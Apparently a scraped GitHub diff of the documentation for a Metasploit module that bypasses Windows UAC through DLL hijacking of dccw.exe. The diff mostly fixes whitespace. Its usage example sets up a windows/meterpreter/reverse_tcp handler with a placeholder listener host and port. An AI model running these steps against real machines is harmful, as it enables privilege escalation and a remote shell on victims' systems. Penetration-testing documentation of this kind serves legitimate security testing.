3
3
## Description
4
4
5
5
This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on and
6
- supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions
7
- of Windows 7.
6
+ supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions of Windows 7.
8
7
9
8
### Vulnerable application setup
10
9
Not Applicable; works on stock Windows releases.
11
10
12
11
### Running Example:
13
12
```
14
- > use exploit/multi/handleruse expl
15
- > set payload windows/meterpreter/reverse_tcp
13
+ > use exploit/multi/handler
14
+ > set payload windows/meterpreter/reverse_tcp
16
15
payload => windows/meterpreter/reverse_tcp
17
- > set LHOST <MSF_IP>
16
+ > set LHOST <MSF_IP>
18
17
LHOST => <MSF_IP>
19
18
> set LPORT 30009
20
19
LPORT => 30009
@@ -31,7 +30,7 @@ Payload options (windows/meterpreter/reverse_tcp):
31
30
Name Current Setting Required Description
32
31
---- --------------- -------- -----------
33
32
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
34
- LHOST <MSF_IP> yes The listen address
33
+ LHOST <MSF_IP> yes The listen address
35
34
LPORT 30009 yes The listen port
36
35
37
36
@@ -137,7 +136,7 @@ Payload options (windows/meterpreter/reverse_tcp):
137
136
Name Current Setting Required Description
138
137
---- --------------- -------- -----------
139
138
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
140
- LHOST <MSF_IP> yes The listen address
139
+ LHOST <MSF_IP> yes The listen address
141
140
LPORT 30010 yes The listen port
142
141
143
142
0 commit comments